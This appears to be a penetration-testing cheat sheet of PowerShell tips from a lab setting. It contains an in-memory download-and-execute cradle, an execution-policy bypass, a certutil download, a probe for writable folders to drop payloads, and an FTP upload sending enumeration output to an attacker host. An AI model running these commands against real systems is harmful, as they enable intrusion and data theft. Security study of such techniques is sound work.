CLI Tips
Powershell
Load Powershell Module Over HTTP
Fetch a script over HTTP and execute it in the current session without writing it to disk (the classic download-cradle; expect AMSI and script-block logging to see the decoded content):
IEX (New-Object Net.WebClient).DownloadString('http://example.com/some_module.ps1')
Bypass Powershell Execution Policy
Under a Restricted execution policy you cannot run external .ps1 scripts. The policy is a per-session safety setting rather than a security boundary, and the -ExecutionPolicy switch overrides it for that process only. Start Powershell with the policy bypassed:
powershell.exe -ExecutionPolicy Bypass
Switch to 64-bit Powershell from 32-bit
If you're on a 64-bit machine and running a 32-bit Powershell, then some things might not work, such as autologon discovery.
Check in powershell:
[environment]::Is64BitOperatingSystem
[environment]::Is64BitProcess
Access 64-bit Powershell at:
C:\Windows\SysNative\WindowsPowerShell\v1.0\Powershell.exe
SysNative is a virtual directory: it exists only for 32-bit (WOW64) processes, where it maps to the real 64-bit System32, and it does not exist at all from a 64-bit process. It will not show up in a directory listing of C:\Windows, but the path resolves when a 32-bit process opens it.
Just running that executable from an existing 32-bit executable might not work. I got it to work when I rewrote the original payload to use this path instead of just powershell.exe with no path.
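The following is an added example, not code from the original page: a script that performs the checks above and relaunches itself through the SysNative path when it finds it is running as a 32-bit process. It assumes the script is run from a file on disk (so $PSCommandPath is set) and that powershell.exe lives at the standard v1.0 location.

```powershell
# Added example (not from the original page): relaunch in 64-bit PowerShell when
# this script detects it is running as a 32-bit (WOW64) process.
# Assumes it is started from a file on disk, so $PSCommandPath is populated.
if ([Environment]::Is64BitOperatingSystem -and -not [Environment]::Is64BitProcess) {
    # SysNative is a virtual directory that only a 32-bit process can see;
    # from a 64-bit process this path does not exist.
    $ps64 = Join-Path $env:windir 'SysNative\WindowsPowerShell\v1.0\powershell.exe'
    if (-not $PSCommandPath) {
        Write-Warning 'Not running from a file; cannot relaunch. Start the SysNative powershell.exe by hand.'
    } elseif (Test-Path -LiteralPath $ps64) {
        # Pass any arguments through and return the child's exit code
        & $ps64 -NoProfile -ExecutionPolicy Bypass -File $PSCommandPath @args
        exit $LASTEXITCODE
    } else {
        Write-Warning "64-bit PowerShell not found at $ps64; continuing as 32-bit."
    }
}
# Everything below this line runs in the 64-bit process when the relaunch worked.
"Is64BitProcess: $([Environment]::Is64BitProcess); PID $PID"
```

Save it as relaunch.ps1 and run it from a 32-bit shell; the first line of output shows Is64BitProcess: True and a new PID when the relaunch succeeded. The Test-Path branch covers 32-bit Windows, where SysNative does not exist and nothing needs to change.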
View Hidden Files
Get-ChildItem -Force
Running Powershell commands from CMD
You can do it like this, but you need to press enter to get the output.
powershell -command "whoami"
Writable Folders
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\Tasks
C:\Windows\tracing
C:\Windows\Temp
C:\Users\Public
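Whether these folders are writable for the current account depends on the build and any hardening applied, so it is worth probing them instead of assuming. The script below is an added example, not from the original page: it creates and deletes a random file in each candidate and reports the outcome as objects. It assumes the standard %windir% and %SystemDrive% locations for the paths listed above.

```powershell
# Added example (not from the original page): probe the candidate folders above
# by creating and deleting a random file, and report the result as objects.
# Run it from 64-bit PowerShell: in a 32-bit process, System32 is redirected to
# SysWOW64, so the two System32 entries would be testing a different directory.
$candidates = @(
    "$env:windir\System32\Microsoft\Crypto\RSA\MachineKeys",
    "$env:windir\System32\spool\drivers\color",
    "$env:windir\Tasks",
    "$env:windir\tracing",
    "$env:windir\Temp",
    "$env:SystemDrive\Users\Public"
)
foreach ($dir in $candidates) {
    if (-not (Test-Path -LiteralPath $dir -PathType Container)) {
        [pscustomobject]@{ Path = $dir; Writable = $false; Note = 'does not exist' }
        continue
    }
    $probe = Join-Path $dir ([IO.Path]::GetRandomFileName())
    $writable = $false
    $note = ''
    try {
        [IO.File]::WriteAllText($probe, 'probe')
        $writable = $true
    } catch {
        $note = $_.Exception.GetType().Name
    }
    if ($writable) {
        # Some ACLs allow creating files but not deleting them; report rather than fail
        try { Remove-Item -LiteralPath $probe -Force -ErrorAction Stop }
        catch { $note = "created but could not delete $probe" }
    }
    [pscustomobject]@{ Path = $dir; Writable = $writable; Note = $note }
}
```

The output is a table of Path, Writable and Note; a folder reported as writable with a "could not delete" note still accepts new files, which is usually what matters for dropping a payload, but leaves the probe file behind to clean up.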
Transferring Files
HTTP Download
Start an HTTP server on your Linux machine:
python3 -m http.server
Download a file over HTTP with curl. In Windows PowerShell 5.1, curl is an alias for Invoke-WebRequest, so -O resolves to -OutFile; PowerShell 7 dropped that alias, so there (or from cmd) you are calling curl.exe, whose save-to-file flag is a lowercase -o followed by the file name:
curl http://IP:PORT/file.exe -O ./file.exe
Download a file using certutil (a well-known LOLBin; expect AV/EDR to flag this usage):
certutil.exe -urlcache -split -f http://IP:PORT/path/filename.exe filename.exe
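Whichever downloader is used, a file fetched over plain HTTP should be checked before it is run, since anything on the path can alter it. The function below is an added example, not code from the original page: it downloads with Invoke-WebRequest (available on every supported Windows PowerShell version) and refuses the file unless its SHA-256 matches the hash computed on the attacker box. The URL, output path and hash in the usage comment are placeholders.

```powershell
# Added example (not from the original page): download over HTTP and verify
# the SHA-256 before the file is used. Compute the expected hash on the
# serving host first, e.g. with `sha256sum file.exe` on Linux.
function Get-VerifiedFile {
    param(
        [Parameter(Mandatory)][string]$Url,
        [Parameter(Mandatory)][string]$OutFile,
        [Parameter(Mandatory)][string]$ExpectedSha256
    )
    # -UseBasicParsing avoids the Internet Explorer engine dependency on Windows PowerShell 5.1
    Invoke-WebRequest -Uri $Url -OutFile $OutFile -UseBasicParsing

    $actual = (Get-FileHash -LiteralPath $OutFile -Algorithm SHA256).Hash
    # String comparison in PowerShell is case-insensitive, so hex case does not matter
    if ($actual -ne $ExpectedSha256) {
        Remove-Item -LiteralPath $OutFile -Force
        throw "Hash mismatch for $Url : got $actual, expected $ExpectedSha256"
    }
    Get-Item -LiteralPath $OutFile
}

# Usage (placeholder values):
# Get-VerifiedFile -Url 'http://IP:PORT/file.exe' -OutFile "$env:TEMP\file.exe" `
#     -ExpectedSha256 '<sha256 from the serving host>'
```

On a mismatch the partial or tampered file is deleted and the function throws, so a caller that chains the download into execution never reaches the run step.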
FTP Upload
Start an FTP server on your linux machine:
pip3 install pyftpdlib
python3 -m pyftpdlib --username myuser --password mypass --write
If you don't specify username and password, then you can log in with user anonymous and no password.
Then, from the Windows box, upload with the .NET WebClient. The ftp:// URI carries the credentials and the port (pyftpdlib listens on 2121 by default):
# Local file to send
$File = "C:\Users\svc-alfresco\Documents\winpeas.txt";
# Destination: user:pass@host:port/remote-name
$ftp = "ftp://myuser:mypass@10.10.14.141:2121/winpeas.txt";
$webclient = New-Object -TypeName System.Net.WebClient;
$uri = New-Object -TypeName System.Uri -ArgumentList $ftp;
# UploadFile blocks until the transfer finishes and throws on failure (bad credentials, no write permission)
$webclient.UploadFile($uri, $File);